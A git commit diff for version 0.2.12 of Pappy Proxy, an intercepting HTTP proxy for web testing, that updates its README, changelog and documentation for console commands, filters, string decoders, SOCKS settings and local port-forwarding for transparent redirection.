jab2870/PappyProxy
1
0
Fork 0
Code Issues Pull requests Releases Wiki Activity

Version 0.2.12

Browse source
This commit is contained in:
Rob Glew 2016-05-02 13:17:25 -04:00
parent 992edab315
commit f28ab4fe96
32 changed files with 2324 additions and 754 deletions
Download patch file Download diff file Expand all files Collapse all files

11
README.md
View file

@ -1,6 +1,6 @@
The Pappy Proxy
===============
[Documentation](https://roglew.github.io/pappy-proxy/) - [Tutorial](https://roglew.github.io/pappy-proxy/tutorial.html)
[Documentation](https://roglew.github.io/pappy-proxy/) - [Tutorial](https://roglew.github.io/pappy-proxy/tutorial.html) - [Website](http://www.pappyproxy.com) - [Blog](http://blog.pappyproxy.com)
Table of Contents
=================
@ -58,6 +58,7 @@ Table of Contents
* [Transparent Host Redirection](#transparent-host-redirection)
* [Project File Encryption](#project-file-encryption)
* [FAQ](#faq)
* [Text just appeared over my prompt! What do I do?!](#text-just-appeared-over-my-prompt-what-do-i-do)
* [Why does my request have an id of --?!?!](#why-does-my-request-have-an-id-of---)
* [Boring, Technical Stuff](#boring-technical-stuff)
* [Request Cache / Memory usage](#request-cache--memory-usage)
@ -1261,6 +1262,11 @@ test.proj
FAQ
---
### Text just appeared over my prompt! What do I do?!
Unfortunately I've been a bit lazy when it comes to printing errors to the terminal. A lot of stuff is just printed to stdout using `print`. This has the side effect of printing over your input. I'm very sorry and I'm trying to work on better solutions, but for now:
* Hit Ctl-L to clear the terminal. Your input will be saved.
### Why does my request have an id of `--`?!?!
You can't do anything with a request/response until it is decoded and saved to disk. In between the time when a request is decoded and when it's saved to disk, it will have an ID of `--`. So just wait a little bit and it will get an ID you can use.
@ -1278,6 +1284,9 @@ Changelog
---------
The boring part of the readme
* 0.2.12
* Add error handling for if creating a connection fails
* Minor bugfixes
* 0.2.11
* Project directory compression/encryption. Thanks, onizenso!
* Add `submit` command

2
docs/build/html/.buildinfo vendored
View file

@ -1,4 +1,4 @@
# Sphinx build info version 1
# This file hashes the configuration used when building these files. When it is not found, a full rebuild will be done.
config: 218eea0cc3c2e724d7b1270f4fcdcfb7
config: acf4b28924e7be348c4339aeb8b5e3ae
tags: 645f666f9bcd5a90fca523b33c5a78b7

1
docs/build/html/_sources/index.txt vendored
View file

@ -14,6 +14,7 @@ Contents:
overview
tutorial
pappyplugins
contributing
Indices and tables

469
docs/build/html/_sources/overview.txt vendored
View file

@ -37,6 +37,9 @@ feature. So you can also contribute by writing a plugin and letting me
know about it. You can find out more by looking at `the official plugin
docs <https://roglew.github.io/pappy-proxy/pappyplugins.html>`__.
You can find ideas for features to add on `the contributing page in the
docs <https://roglew.github.io/pappy-proxy/contributing.html>`__.
How to Use It
=============
@ -173,6 +176,130 @@ The following tokens will also be replaced with values:
See the default ``config.json`` for examples.
General Console Techniques
--------------------------
There are a few tricks you can use in general when using Pappy's
console. Most of these are provided by the
`cmd <https://docs.python.org/2/library/cmd.html>`__ and
`cmd2 <https://pythonhosted.org/cmd2/index.html>`__.
Run a shell command
~~~~~~~~~~~~~~~~~~~
You can run a shell command with ``!``:
::
pappy> ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
5 GET vitaly.sexy /netscape.gif 304 Not Modified 0 0 0.08 --
4 GET vitaly.sexy /esr1.jpg 304 Not Modified 0 0 0.07 --
3 GET vitaly.sexy /construction.gif 304 Not Modified 0 0 0.07 --
2 GET vitaly.sexy /vitaly2.jpg 0 N/A -- --
1 GET vitaly.sexy / 304 Not Modified 0 0 0.07 --
pappy> !ls
cmdhistory config.json data.db
pappy>
Running Python Code
~~~~~~~~~~~~~~~~~~~
You can use the ``py`` command to either run python code or to drop down
to a Python shell.
::
pappy> py print ':D '*10
:D :D :D :D :D :D :D :D :D :D
pappy> py
Python 2.7.6 (default, Jun 22 2015, 17:58:13)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
(ProxyCmd)
py <command>: Executes a Python command.
py: Enters interactive Python mode.
End with ``Ctrl-D`` (Unix) / ``Ctrl-Z`` (Windows), ``quit()``, '`exit()``.
Non-python commands can be issued with ``cmd("your command")``.
Run python code from external files with ``run("filename.py")``
>>> from pappyproxy import config
>>> config.CONFIG_DICT
{u'data_file': u'./data.db', u'history_size': 1000, u'cert_dir': u'{DATADIR}/certs', u'proxy_listeners': [{u'interface': u'127.0.0.1', u'port': 8000}]}
>>> exit()
pappy>
Redirect Output To File
~~~~~~~~~~~~~~~~~~~~~~~
You can use ``>`` to direct output to a file. However, a number of
commands use colored output. If you just redirect these to a file, there
will be additional bytes which represent the ANSI color codes. To get
around this, use the ``nocolor`` command to remove the color from the
command output.
::
pappy> ls > ls.txt
pappy> !xxd -c 32 -g 4 ls.txt
0000000: 1b5b316d 1b5b346d 49442020 56657262 2020486f 73742020 20202020 20202050 .[1m.[4mID Verb Host P
0000020: 61746820 20202020 20202020 20202020 2020532d 436f6465 20202020 20202020 ath S-Code
0000040: 20202020 52657120 4c656e20 20527370 204c656e 20205469 6d652020 20204d6e Req Len Rsp Len Time Mn
0000060: 676c2020 1b5b306d 0a352020 201b5b33 366d4745 541b5b30 6d202020 1b5b3931 gl .[0m.5 .[36mGET.[0m .[91
0000080: 6d766974 616c792e 73657879 1b5b306d 20201b5b 33366d1b 5b306d2f 1b5b3334 mvitaly.sexy.[0m .[36m.[0m/.[34
00000a0: 6d6e6574 73636170 652e6769 661b5b30 6d202020 2020201b 5b33356d 33303420 mnetscape.gif.[0m .[35m304
00000c0: 4e6f7420 4d6f6469 66696564 1b5b306d 20203020 20202020 20202030 20202020 Not Modified.[0m 0 0
00000e0: 20202020 302e3038 20202020 2d2d2020 20200a34 2020201b 5b33366d 4745541b 0.08 -- .4 .[36mGET.
0000100: 5b306d20 20201b5b 39316d76 6974616c 792e7365 78791b5b 306d2020 1b5b3336 [0m .[91mvitaly.sexy.[0m .[36
0000120: 6d1b5b30 6d2f1b5b 33346d65 7372312e 6a70671b 5b306d20 20202020 20202020 m.[0m/.[34mesr1.jpg.[0m
0000140: 201b5b33 356d3330 34204e6f 74204d6f 64696669 65641b5b 306d2020 30202020 .[35m304 Not Modified.[0m 0
0000160: 20202020 20302020 20202020 2020302e 30372020 20202d2d 20202020 0a332020 0 0.07 -- .3
0000180: 201b5b33 366d4745 541b5b30 6d202020 1b5b3931 6d766974 616c792e 73657879 .[36mGET.[0m .[91mvitaly.sexy
00001a0: 1b5b306d 20201b5b 33366d1b 5b306d2f 1b5b3334 6d636f6e 73747275 6374696f .[0m .[36m.[0m/.[34mconstructio
00001c0: 6e2e6769 661b5b30 6d20201b 5b33356d 33303420 4e6f7420 4d6f6469 66696564 n.gif.[0m .[35m304 Not Modified
00001e0: 1b5b306d 20203020 20202020 20202030 20202020 20202020 302e3037 20202020 .[0m 0 0 0.07
0000200: 2d2d2020 20200a32 2020201b 5b33366d 4745541b 5b306d20 20201b5b 39316d76 -- .2 .[36mGET.[0m .[91mv
0000220: 6974616c 792e7365 78791b5b 306d2020 1b5b3336 6d1b5b30 6d2f1b5b 33346d76 italy.sexy.[0m .[36m.[0m/.[34mv
0000240: 6974616c 79322e6a 70671b5b 306d2020 20202020 201b5b33 366d3230 30204f4b italy2.jpg.[0m .[36m200 OK
0000260: 1b5b306d 20202020 20202020 20202020 30202020 20202020 20323033 34303033 .[0m 0 2034003
0000280: 20203135 352e3131 20202d2d 20202020 0a312020 201b5b33 366d4745 541b5b30 155.11 -- .1 .[36mGET.[0
00002a0: 6d202020 1b5b3931 6d766974 616c792e 73657879 1b5b306d 20201b5b 33366d1b m .[91mvitaly.sexy.[0m .[36m.
00002c0: 5b306d2f 1b5b3334 6d1b5b30 6d202020 20202020 20202020 20202020 2020201b [0m/.[34m.[0m .
00002e0: 5b33356d 33303420 4e6f7420 4d6f6469 66696564 1b5b306d 20203020 20202020 [35m304 Not Modified.[0m 0
0000300: 20202030 20202020 20202020 302e3037 20202020 2d2d2020 20200a 0 0.07 -- .
pappy> nocolor ls > ls2.txt
pappy> !xxd -c 32 -g 4 ls2.txt
0000000: 49442020 56657262 2020486f 73742020 20202020 20202050 61746820 20202020 ID Verb Host Path
0000020: 20202020 20202020 2020532d 436f6465 20202020 20202020 20202020 52657120 S-Code Req
0000040: 4c656e20 20527370 204c656e 20205469 6d652020 20204d6e 676c2020 0a352020 Len Rsp Len Time Mngl .5
0000060: 20474554 20202076 6974616c 792e7365 78792020 2f6e6574 73636170 652e6769 GET vitaly.sexy /netscape.gi
0000080: 66202020 20202033 3034204e 6f74204d 6f646966 69656420 20302020 20202020 f 304 Not Modified 0
00000a0: 20203020 20202020 20202030 2e303820 2020202d 2d202020 200a3420 20204745 0 0.08 -- .4 GE
00000c0: 54202020 76697461 6c792e73 65787920 202f6573 72312e6a 70672020 20202020 T vitaly.sexy /esr1.jpg
00000e0: 20202020 33303420 4e6f7420 4d6f6469 66696564 20203020 20202020 20202030 304 Not Modified 0 0
0000100: 20202020 20202020 302e3037 20202020 2d2d2020 20200a33 20202047 45542020 0.07 -- .3 GET
0000120: 20766974 616c792e 73657879 20202f63 6f6e7374 72756374 696f6e2e 67696620 vitaly.sexy /construction.gif
0000140: 20333034 204e6f74 204d6f64 69666965 64202030 20202020 20202020 30202020 304 Not Modified 0 0
0000160: 20202020 20302e30 37202020 202d2d20 2020200a 32202020 47455420 20207669 0.07 -- .2 GET vi
0000180: 74616c79 2e736578 7920202f 76697461 6c79322e 6a706720 20202020 20203230 taly.sexy /vitaly2.jpg 20
00001a0: 30204f4b 20202020 20202020 20202020 30202020 20202020 20323033 34303033 0 OK 0 2034003
00001c0: 20203135 352e3131 20202d2d 20202020 0a312020 20474554 20202076 6974616c 155.11 -- .1 GET vital
00001e0: 792e7365 78792020 2f202020 20202020 20202020 20202020 20202033 3034204e y.sexy / 304 N
0000200: 6f74204d 6f646966 69656420 20302020 20202020 20203020 20202020 20202030 ot Modified 0 0 0
0000220: 2e303720 2020202d 2d202020 200a0a .07 -- ..
pappy>
If you want to write the contents of a request or response to a file,
don't use ``nocolor`` with ``vfq`` or ``vfs``. Use just the ``vbq`` or
``vbs`` commands.
+---------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Command | Description |
+===============+==============================================================================================================================================================================+
| ``nocolor`` | Run a command and print its output without ASCII escape codes. Intended for use when redirecting output to a file. Should only be used with text and not with binary data. |
+---------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Generating Pappy's CA Cert
--------------------------
@ -195,23 +322,45 @@ Browsing Recorded Requests/Responses
The following commands can be used to view requests and responses
+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Command | Aliases | Description |
+====================+================================+====================================================================================================================================================================================================================================================================================================================================================================================================================================+
| ``ls [a|<num>``] | list, ls | List requests that are in the current context (see Context section). Has information like the host, target path, and status code. With no arguments, it will print the 25 most recent requests in the current context. If you pass 'a' or 'all' as an argument, it will print all the requests in the current context. If you pass a number "n" as an argument, it will print the n most recent requests in the current context. |
+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``sm`` | sm, site\_map | Print a tree showing the site map. It will display all requests in the current context that did not have a 404 response. |
+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``viq <id(s)>`` | view\_request\_info, viq | View additional information about requests. Includes the target port, if SSL was used, applied tags, and other information. |
+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``vfq <id(s)>`` | view\_full\_request, vfq | [V]iew [F]ull Re[Q]uest, prints the full request including headers and data. |
+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``vhq <id(s)>`` | view\_request\_headers, vhq | [V]iew [H]eaders of a Re[Q]uest. Prints just the headers of a request. |
+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``vfs <id(s)>`` | view\_full\_response, vfs | [V]iew [F]ull Re[S]ponse, prints the full response associated with a request including headers and data. |
+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``vhs <id(s)>`` | view\_response\_headers, vhs | [V]iew [H]eaders of a Re[S]ponse. Prints just the headers of a response associated with a request. |
+--------------------+--------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Command | Aliases | Description |
+==============================================================================================================================================================================================================================================================================================================+==================================+====================================================================================================================================================================================================================================================================================================================================================================================================================================+
| ``ls [a|<num>``] | list, ls | List requests that are in the current context (see Context section). Has information like the host, target path, and status code. With no arguments, it will print the 25 most recent requests in the current context. If you pass 'a' or 'all' as an argument, it will print all the requests in the current context. If you pass a number "n" as an argument, it will print the n most recent requests in the current context. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``sm`` [p] | sm, site\_map | Print a tree showing the site map. It will display all requests in the current context that did not have a 404 response. This has to go through all of the requests in the current context so it may be slow. If the ``p`` option is given, it will print the paths as paths rather than as a tree. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``viq <id(s)>`` | view\_request\_info, viq | View additional information about requests. Includes the target port, if SSL was used, applied tags, and other information. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``vfq <id(s)>`` | view\_full\_request, vfq, kjq | [V]iew [F]ull Re[Q]uest, prints the full request including headers and data. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``vbq <id(s)>`` | view\_request\_bytes, vbq | [V]iew [B]ytes of Re[Q]uest, prints the full request including headers and data without coloring or additional newlines. Use this if you want to write a request to a file. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``ppq <format> <id(s)>`` | pretty\_print\_request, ppq | Pretty print a request with a specific format. See the table below for a list of formats. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``vhq <id(s)>`` | view\_request\_headers, vhq | [V]iew [H]eaders of a Re[Q]uest. Prints just the headers of a request. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``vfs <id(s)>`` | view\_full\_response, vfs, kjs | [V]iew [F]ull Re[S]ponse, prints the full response associated with a request including headers and data. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``vhs <id(s)>`` | view\_response\_headers, vhs | [V]iew [H]eaders of a Re[S]ponse. Prints just the headers of a response associated with a request. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``vbs <id(s)>`` | view\_response\_bytes, vbs | [V]iew [B]ytes of Re[S]ponse, prints the full response including headers and data without coloring or additional newlines. Use this if you want to write a response to a file. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``pps <format> <id(s)>`` | pretty\_print\_response, pps | Pretty print a response with a specific format. See the table below for a list of formats. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``pprm <id(s)>`` | print\_params, pprm | Print a summary of the parameters submitted with the request. It will include URL params, POST params, and/or cookies |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``pri [ct] [key(s)] | param_info, pri | Print a summary of the parameters and values submitted by in-context requests. You can pass in keys to limit which values will be shown. If you also provide``\ ct\ ``as the first argument, it will include any keys that are passed as arguments. | |``\ watch\` | watch | Print requests and responses in real time as they pass through the proxy. |
+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Available formats for ``ppq`` and ``pps`` commands:
+------------+------------------------------------------------------------+
| Format | Description |
+============+============================================================+
| ``form`` | Print POST data submitted from a form (normal post data) |
+------------+------------------------------------------------------------+
| ``json`` | Print as JSON |
+------------+------------------------------------------------------------+
The table shown by ``ls`` will have the following columns:
@ -408,12 +557,20 @@ List of fields
+--------------+--------------------------------+----------------------------------------------------------------------------------+-------------+
| body | body, data, bd, dt | The body (data section) of either the request or the response | String |
+--------------+--------------------------------+----------------------------------------------------------------------------------+-------------+
| reqbody | qbody, qdata, qbd, qdt | The body (data section) of th request | String |
+--------------+--------------------------------+----------------------------------------------------------------------------------+-------------+
| rspbody | sbody, sdata, sbd, sdt | The body (data section) of th response | String |
+--------------+--------------------------------+----------------------------------------------------------------------------------+-------------+
| verb | verb, vb | The HTTP verb of the request (ie GET, POST) | String |
+--------------+--------------------------------+----------------------------------------------------------------------------------+-------------+
| param | param, pm | Either the get or post parameters | Key/Value |
+--------------+--------------------------------+----------------------------------------------------------------------------------+-------------+
| header | header, hd | An HTTP header (ie User-Agent, Basic-Authorization) in the request or response | Key/Value |
+--------------+--------------------------------+----------------------------------------------------------------------------------+-------------+
| reqheader | reqheader, qhd | An HTTP header in the request | Key/Value |
+--------------+--------------------------------+----------------------------------------------------------------------------------+-------------+
| rspheader | rspheader, shd | An HTTP header in the response | Key/Value |
+--------------+--------------------------------+----------------------------------------------------------------------------------+-------------+
| rawheaders | rawheaders, rh | The entire header section (as one string) of either the head or the response | String |
+--------------+--------------------------------+----------------------------------------------------------------------------------+-------------+
| sentcookie | sentcookie, sck | A cookie sent in a request | Key/Value |
@ -465,6 +622,21 @@ can still negate these.
+-----------+------------------+---------------------------------------------------------------------------------------------------------+
| after | after, af | Filters out any request that is not before the given request. Filters out any request without a time. |
+-----------+------------------+---------------------------------------------------------------------------------------------------------+
| inv | inf | Inverts a filter string. Anything that matches the filter string will not pass the filter. |
+-----------+------------------+---------------------------------------------------------------------------------------------------------+
Examples:
::
Only show requests before request 1234
f b4 1234
Only show requests after request 1234
f af 1234
Show requests without a csrf parameter
f inv param ct csrf
Scope
-----
@ -514,6 +686,81 @@ The ``fbi`` command also supports tab completion.
| ``fbi <filter>`` | ``builtin_filter``, ``fbi`` | Apply a built-in filter to the current context |
+--------------------+-------------------------------+--------------------------------------------------+
Decoding Strings
----------------
These features try to fill a similar role to Burp's decoder. Each
command will automatically copy the results to the clipboard. In
addition, if no string is given, the commands will encode/decode
whatever is already in the clipboard. Here is an example of how to
base64 encode/decode a string.
::
pappy> b64e "Hello World!"
SGVsbG8gV29ybGQh
pappy> b64d
Hello World!
pappy>
And if the result contains non-printable characters, a hexdump will be
produced instead
::
pappy> b64d ImALittleTeapot=
0000 22 60 0b 8a db 65 79 37 9a a6 8b "`...ey7...
pappy>
The following commands can be used to encode/decode strings:
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Command | Aliases | Description |
+===========================+=====================================+=====================================================================================================================================================================+
| ``base64_decode`` | ``base64_decode``, ``b64d`` | Base64 decode a string |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``base64_encode`` | ``base64_encode``, ``b64e`` | Base64 encode a string |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``asciihex_decode`` | ``asciihex_decode``, ``ahd`` | Decode an ASCII hex string |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``asciihex_encode`` | ``asciihex_encode``, ``ahe`` | Encode an ASCII hex string |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``html_decode`` | ``html_decode``, ``htmld`` | Decode an html encoded string |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``html_encode`` | ``html_encode``, ``htmle`` | Encode a string to html encode all of the characters |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``url_decode`` | ``url_decode``, ``urld`` | Url decode a string |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``url_encode`` | ``url_encode``, ``urle`` | Url encode a string |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``gzip_decode`` | ``gzip_decode``, ``gzd`` | Gzip decompress a string. Probably won't work too well since there's not a great way to get binary data passed in as an argument. I'm working on this. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``gzip_encode`` | ``gzip_encode``, ``gze`` | Gzip compress a string. Result doesn't get copied to the clipboard. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``base64_decode_raw`` | ``base64_decode_raw``, ``b64dr`` | Same as ``base64_decode`` but will not print a hexdump if it contains non-printable characters. It is suggested you use ``>`` to redirect the output to a file. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``base64_encode_raw`` | ``base64_encode_raw``, ``b64er`` | Same as ``base64_encode`` but will not print a hexdump if it contains non-printable characters. It is suggested you use ``>`` to redirect the output to a file. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``asciihex_decode_raw`` | ``asciihex_decode_raw``, ``ahdr`` | Same as ``asciihex_decode`` but will not print a hexdump if it contains non-printable characters. It is suggested you use ``>`` to redirect the output to a file. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``asciihex_encode_raw`` | ``asciihex_encode_raw``, ``aher`` | Same as ``asciihex_encode`` but will not print a hexdump if it contains non-printable characters. It is suggested you use ``>`` to redirect the output to a file. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``html_decode_raw`` | ``html_decode_raw``, ``htmldr`` | Same as ``html_decode`` but will not print a hexdump if it contains non-printable characters. It is suggested you use ``>`` to redirect the output to a file. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``html_encode_raw`` | ``html_encode_raw``, ``htmler`` | Same as ``html_encode`` but will not print a hexdump if it contains non-printable characters. It is suggested you use ``>`` to redirect the output to a file. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``url_decode_raw`` | ``url_decode_raw``, ``urldr`` | Same as ``url_decode`` but will not print a hexdump if it contains non-printable characters. It is suggested you use ``>`` to redirect the output to a file. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``url_encode_raw`` | ``url_encode_raw``, ``urler`` | Same as ``url_encode`` but will not print a hexdump if it contains non-printable characters. It is suggested you use ``>`` to redirect the output to a file. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``gzip_decode_raw`` | ``gzip_decode_raw``, ``gzdr`` | Same as ``gzip_decode`` but will not print a hexdump if it contains non-printable characters. It is suggested you use ``>`` to redirect the output to a file. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``gzip_encode_raw`` | ``gzip_encode_raw``, ``gzer`` | Same as ``gzip_encode`` but will not print a hexdump if it contains non-printable characters. It is suggested you use ``>`` to redirect the output to a file. |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``unixtime_decode`` | ``unixtime_decode``, ``uxtd`` | Take in a unix timestamp and print a human readable timestamp |
+---------------------------+-------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Interceptor
-----------
@ -1033,6 +1280,8 @@ error checking.
+----------------------------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``export <req|rsp> <reqid>`` | ``export`` | Writes either the full request or response to a file in the current directory. |
+----------------------------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+
| ``merge <dbfile>`` | ``merge`` | Add all the requests from another datafile to the current datafile |
+----------------------------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------+
Response streaming
~~~~~~~~~~~~~~~~~~
@ -1146,6 +1395,116 @@ plugin for it. You may also consider keeping a ``mine.py`` plugin where
you can write out commands that you use regularly but may not be worth
creating a dedicated plugin for.
Global Settings
---------------
There are some settings that apply to Pappy as a whole and are stored in
``~/.pappy/global_config.json``. These settings are generally for tuning
performance or modifying behavior on a system-wide level. No information
about projects is put in here since it is world readable. You can
technically add settings in here for plugins that you write, but if it's
at all possible, please keep settings in the normal project config.
Settings included in ``~/.pappy/global_config.json``:
+---------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| Setting | Description |
+===============+===============================================================================================================================================================================+
| cache\_size | The number of requests from history that will be included in memory at any given time. Set to -1 to keep everything in memory. See the request cache section for more info. |
+---------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Using a SOCKS Server
--------------------
Pappy allows you to use an upstream SOCKS server. You can do this by
adding a ``socks_proxy`` value to config.json. You can use the following
for anonymous access to the proxy:
::
"socks_proxy": {"host":"socks.proxy.host", "port":5555}
To use credentials you add a ``username`` and ``password`` value to the
dictionary:
::
"socks_proxy": {"host":"socks.proxy.host", "port":5555, "username": "mario", "password":"ilovemushrooms"}
Anything that passes through any of the active listeners will use the
proxy.
Transparent Host Redirection
----------------------------
Sometimes you get a frustrating thick client that doesnt let you mess
with proxy settings to get it to go through a proxy. However, if you can
redirect where it sends its traffic to localhost, you can get Pappy to
take that traffic and redirect it to go where it should.
It takes root permissions to listen on low numbered ports. As a result,
well need to do some root stuff to listen on ports 80 and 443 and get
the data to Pappy. There are two ways to get the traffic to Pappy. The
first is to set up port forwarding as root to send traffic from
localhost:80 to localhost:8080 and localhost:443 to localhost:8443
(since we can listen on 8080 and 8443 without root). Or you can YOLO,
run Pappy as root and just have it listen on 80 and 443.
According to Google you can use the following command to forward port 80
on localhost to 8080 on Linux:
::
iptables -t nat -A PREROUTING -i ppp0 -p tcp --dport 80 -j REDIRECT --to-ports 8080
Then to route 443 to 8443:
::
iptables -t nat -A PREROUTING -i ppp0 -p tcp --dport 443 -j REDIRECT --to-ports 8443
Of course, both of these need to be run as root.
Then on mac its
::
echo "
rdr pass inet proto tcp from any to any port 80 -> 127.0.0.1 port 8080
rdr pass inet proto tcp from any to any port 443 -> 127.0.0.1 port 8443
" | sudo pfctl -ef -
Then to turn it off on mac its
sudo pfctl -F all -f /etc/pf.conf
Then modify the listener settings in the projects config.json to be:
::
"proxy_listeners": [
{"port": 8080, "interface": "127.0.0.1", "forward_host": "www.example.faketld"},
{"port": 8443, "interface": "127.0.0.1", "forward_host_ssl": "www.example.faketld"},
]
This configuration will cause Pappy to open a port on 8080 that will
accept connections normally and a port on 8443 which will accept SSL
connections. The forward\_host setting tells Pappy to redirect any
requests sent to the port to the given host. It will also update the
